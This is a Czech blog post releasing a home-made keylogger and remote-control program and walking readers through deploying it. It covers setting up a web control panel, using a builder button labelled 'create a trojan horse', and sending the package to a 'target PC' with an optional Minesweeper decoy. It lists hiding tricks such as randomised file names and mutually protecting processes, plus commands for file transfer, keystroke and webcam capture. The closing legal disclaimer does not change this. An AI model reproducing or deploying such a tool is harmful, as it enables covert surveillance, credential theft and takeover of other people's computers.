Kategorie: IT, Hacking, Keyloggery

Projekt Real Time KeyLogger | DOWNLOAD - 3.část

První download realtime keylogeru - program má nyní mnoho zajímavých funkcí a i zlepšené webové prostředí. Jelikož se říká, že základ úspěchu je sdílení informací, dávám hrubou verzi ke stažení a vyzkoušení - nechť slouží k dobru.

Autor: KdoSiOdJinud | Vydáno: 27.10.2010 9:37 | Přečteno: 67512x | Komentářů: 0

Popis programu KeyLog_0.1.9

Program slouží k monitorování a ovládání pc, je určen pro vzdálný přístup a správu svých PC s výhodou nezávislosti na veřejných ip adresách a celkově cestě připojení tzn. že ovládaný notebook, který se připojuje na různých místech k síti internetu je ovládán pořád stejně nezávisle na místě připojení.

Co program umí

  • přístup k příkazové řádce
  • sledování stisků kláves v realném čase na cílovém pc
  • přístup k webové kameře (pouze snímky+upload)
  • ovládání cd-rom (vysunutí/zasunutí)
  • sejmutí printscreenu+upload
  • upload čehokoliv z pc
  • download čehokoliv do pc
  • Pár vtípků

  • zmizení ikon na ploše
  • změna tapety
  • funkce FUCKDESKTOP (printscreen > zmizení ikon > nastavení printsceenu jako tapety)
  • zobrazování hlášek (nedoděláno - hrozí odhalení umístění při zobrazení hlášky)
  • Skryté, ale užitečné

  • vzájemné krytí dvou běžících aplikací -> těžší ukončení (nikoliv nemožné)
  • u každé instalace má *.exe jinačí název

Instalace

Stáhněte si tento archiv: zkušební verze již není ke stažení

Poskytuji pouze časově omezenou verzi KeyLogu, důvodů je více: neustálý vývoj, omezení brutálního šíření bude li úspěšný, chci mít kontrolu. Verze, kterou dávám k dispozici je funkční do 1.1.2011

  1. zaregistrujeme si hosting s php a mysql
  2. uploadujeme na náš hosting obsah složky "web"
  3. v souboru na hostingu k/connect.php vyplníme údaje k mysql
  4. v mysql spustíme tyto dotazy pro vytvoření db (například v phpmyadmin viz.obr )
  5. nyní se můžeme přihlásit na této adrese "www.nashosting.cz/k/" (uživatel: admin heslo: root)
  6. složku web můžeme v pc smazat, zůstává nám složka Project KSOJ - tato složka zůstává u vás v pc a pomocí ní můžeme konfigurovat a lehce vytvářet nové KeyLogy

Videotutoriál

Nenechte se zmást WinXP ve virtualboxu :-)

Tak a nyní máme vše připraveno, teď už jen vytvořit náš KeyLog (nastavení pro přihlášení právě na naše webové prostředí) a můžeme posílat

Princip fungování

Aby se program "vnořil" do cílového pc, je třeba zaslat minimálně dva soubory (data.c a *.exe). Po spuštění se buď spustí hra "miny" nebo se nestane nic v závislosti na zvolených parametrechpři vytváření programu (vysvětlení později).

Po spuštění se program zkopíruje do pc a začne funovat jak proces *.exe (náhodný název) tak check.exe. Při prvním spuštění si také vytvoří svoje id na webovém rozhraní, přes které ho pak ovládáme.

Program si stahuje z webového prostředí příkazy, které následně vykonává v příkazové řádce. Tím je nám server s webovým přístupem prostředníkem a nejsou nutné veřejné ip. Při vytvoření daných souborů v adresáři kde je umístěn náš program se spouští speciální funkce (upload, focení webcam atd... - přesný výčet později)

Při zažádání programu o snímek například z webkamery (nebo jinačí soubor), program jej vytvoří, připojí se na ftp a do složky s id KeyLogu uploaduje požadovaný soubor, který pak vidíme přes web. Toť k využití ftp.

Vytvoření infekčního souboru pro aplikaci na cílové pc

  1. ve složce Projekt KSOJ naleznete KSOJ_Builder.exe, spusťte jej
  2. vyplňte minimálně první 4 kolonky, proxy si vysvětlíme jindy :-)
  3. klikněte na "Ověření připojení k hostingu" je li vše ok, formuláře zezelenají
  4. nyní si zvolte zda se mají zobrazit po spuštění "miny" nebo se nestane nic, při aplikaci na své pc není třeba zobrazovat miny, takže jsou tam vlastně zbytečně :-D
  5. klikněte na "Vytvořit trojského koně" a v adresáři kde je KSOJ_Builder.exe by se měl objevit KSOJ.zip, ten stačí zaslat

Soubory uvnitř můžete do jisté míry měnit, například check můžete smazat úplně, ovšem po spuštění si ho bude snažit program natáhnout z internetu. Start.exe můžete měnit v názvu libovolně, ale na windows vista a win7 je třeba aby byl název Setup.exe. Upravený a připravený zip pak můžeme jednoduše zaslat na cílové pc.

Webové rozhraní - popis

Po přihlášení (user: admin pass: root) vidíme menu:

Documentation - vývoj verzí, spíše orientačně co kdy přibylo a zmizelo :-)

Download - obsah adresáře na hostingu k/download/ - slouží k uložení souborů co se můžou hodit v terénu, defaultně obsahuje "check"

My loggers - výpis registrovaných logerů, po spuštění na cílovém pc se zde samy načtou

Settings - nastavení jaké klávesy se ve výpise záznamu stisknutých kláves budou zobrazovat a které ne, pro snadnější orientaci (doporučuji zobrazovat backspace, enter a tab jinak nic)

Položka My Loggers

Loggers ID - jméno uživatele+unixový čas spuštění (jedinečný identifikátor), při kliknutí na tuto položku se zobrazí výpis stisknutých kláves, ten by se mel sám aktualizovat, ale v některých prohlížečích se tak neděje, otestováno na FF

Clear log - smaže záznamy stisknutých kláves (mimo historii)

Del logger - smaže záznamy logeru z webu, pokud je ale aktivní opět se přihlásí

Save - uloží záznam stisknutých kláves do historie a smaže aktuální záznam

History - čísla uložených historií

Command line - Ready / Wait - při ready nečeká už žádný příkaz na stažení logerem, při wait příkaz doposud nebyl stáhnut, poklepáním se dostáváme k ovládání příkazové řádky

Files - soubory které nám loger uploadoval, například snímky z webcamery atd...

Delete - smaže uploadované soubory

V záložce Ready je i několik tlačítek, ty slouží k rychlému odeslání příkazu - jsou to tlačítka pro printscreen, snímek webcamery a cdrom

Odstranění programu z monitorovaného pc

Odstranění je jednoduché, ve složce kde jsme si soubor vytvářeli pomocí KSOJ_Builderu nalezneme i adresář other a v něm uninstall. Ten stačí na ovládaném pc spustit a vše se nám odstraní

Ke zdrojovým kodum

V databázi a celkově na webu naleznete spoustu věcí, které aplikace nevyužívá - důvodem je zveřejnění rozdělaného projektu, některé věci se teprve připravují atd. Na odlehčení a opravení dotazů pro mysql ještě nebyl tak úplně čas :-), v případě, že by si s tím někdo měl zájem pohrát - rád přivítám zlepšení.

Příklady příkazů pro příkazovou řádku

Stažení čehokoliv na dané pc (soubor bude ve složce c:\advance\ )

echo http://adresa_souboru/neco.txt > c:\advance\download

Upload z pc

echo C:\cesta\souboru.txt > c:\advance\upload

Výpis spuštěných aplikací

1.krok - tasklist > c:\advance\task.txt
2.krok - echo C:\advance\task.txt > c:\advance\upload

Vypnutí aplikace

taskkill /f /im calc.exe

Otevření webové stránky

start www.kdosiodjinud.cz

Zmizení / zobrazení ikon na ploše

echo start > c:\advance\icon
echo stop > c:\advance\icon

Změna tapety

echo C:\cesta\k\obrazku.bmp > c:\advance\wallpaper

FUCKDESKTOP - printscreen > zmizení ikon > printscreen jako tapeta

echo start > c:\advance\fuckdesktop

A další meze v používání cmd se meze nekladou, ovládání webcamery a focení printscreenu je pomocí tlačítek pro rychlejší použití

Proč vlastně projekt zveřejňuji

Jsem si vědom některých chyb programu a neustále se je snažím zdokonalovat, nicméně přivítám veškeré připomínky a kritiku. Kdyby měl někdo zájem účastnit se tvorby poskytnu po zvážení i zdrojové kody a spolupráci přivítám. Takže jakékoli problémy prosím hlašte dole v komentářích... :-) Díky a nechť slouží jen k dobrým věcem...

Závěrem ještě upozorňuji, že projekt KSOJ vzniknul, aby vám umožnil vzdálenou správu počítačů, které jsou ve vašem vlastnictví nebo jejichž majitel vám toto vzdálené ovládání povolil. Jakékoliv jiné využití tohoto projektu je protizákonné a jejím zneužitím se vystavujete trestnímu stíhání! Autor na sebe nebere žádnou zodpovědnost za vaše počínání ani za případné škody způsobené používáním tohoto softwaru! Autor si také uděluje právo vědět na jakých adresách webové aplikace běží - pro ochranu proti zneužití.

Komentáře rss

Pokud hledáte službu či máte dotaz mimo téma článku, využijte prosím sekci Nabídky / poptávky.


Nebyly přidány žádné komentáře.